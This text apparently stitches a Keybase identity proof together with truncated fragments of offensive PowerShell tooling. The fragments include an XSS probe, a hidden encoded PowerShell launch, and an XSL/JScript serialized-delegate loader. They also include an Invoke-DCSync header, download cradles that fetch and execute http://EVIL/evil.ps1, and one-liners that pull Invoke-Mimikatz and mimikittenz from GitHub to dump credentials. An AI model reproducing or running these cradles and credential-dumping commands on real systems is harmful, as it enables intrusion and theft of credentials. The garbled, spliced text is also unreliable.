I hereby claim:
- I am ajohnston9 on github.
- I am ahjohnston25 (https://keybase.io/ahjohnston25) on keybase.
- I have a public key ASCXXr2gkURRlYnXF9QyX6lBTbQU9jESEUh6G3bqBTEnxQo
To claim this, I am signing this object:
alert(1); |
powershell -nop -w hidden -encodedcommand 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 |
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt" xmlns:vb="urn:the-xml-files:xslt-vb" xmlns:user="placeholder" version="1.0"> | |
<!-- Copyright (c) Microsoft Corporation. All rights reserved. --> | |
<xsl:output method="text" omit-xml-declaration="yes" indent="no"/> | |
<xsl:strip-space elements="*" /> | |
<ms:script implements-prefix="user" language="JScript"> | |
<![CDATA[ | |
function Invoke-DCSync | |
{ | |
<# | |
.SYNOPSIS | |
Uses dcsync from mimikatz to collect NTLM hashes from the domain. | |
Author: @monoxgas | |
Improved by: @harmj0y |
var serialized_obj = [ | |
0,1,0,0,0,255,255,255,255,1,0,0,0,0,0,0,0,4,1,0,0,0,34,83,121,115,116,101,109,46,68,101,108, | |
101,103,97,116,101,83,101,114,105,97,108,105,122,97,116,105,111,110,72,111,108,100,101,114,3,0,0,0,8,68,101,108, | |
101,103,97,116,101,7,116,97,114,103,101,116,48,7,109,101,116,104,111,100,48,3,3,3,48,83,121,115,116,101,109,46, | |
68,101,108,101,103,97,116,101,83,101,114,105,97,108,105,122,97,116,105,111,110,72,111,108,100,101,114,43,68,101,108,101, | |
103,97,116,101,69,110,116,114,121,34,83,121,115,116,101,109,46,68,101,108,101,103,97,116,101,83,101,114,105,97,108,105, | |
122,97,116,105,111,110,72,111,108,100,101,114,47,83,121,115,116,101,109,46,82,101,102,108,101,99,116,105,111,110,46,77, | |
101,109,98,101,114,73,110,102,111,83,101,114,105,97,108,105,122,97,116,105,111,110,72,111,108,100,101,114,9,2,0,0, |
# normal download cradle | |
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1") | |
# PowerShell 3.0+ | |
IEX (iwr 'http://EVIL/evil.ps1') | |
# hidden IE com object | |
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r | |
# Msxml2.XMLHTTP COM object |
I hereby claim:
To claim this, I am signing this object:
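*NOTE - These commands download and run scripts from public GitHub repositories that are not under my control, and the URLs point at the `master` branch, so the content can change without notice. Make sure you trust the content (or better yet, make your own fork) prior to using!* | |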
#mimikatz | |
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds | |
#encoded-mimikatz | |
powershell -enc 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 | |
#mimikittenz | |
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/putterpanda/mimikittenz/master/Invoke-m |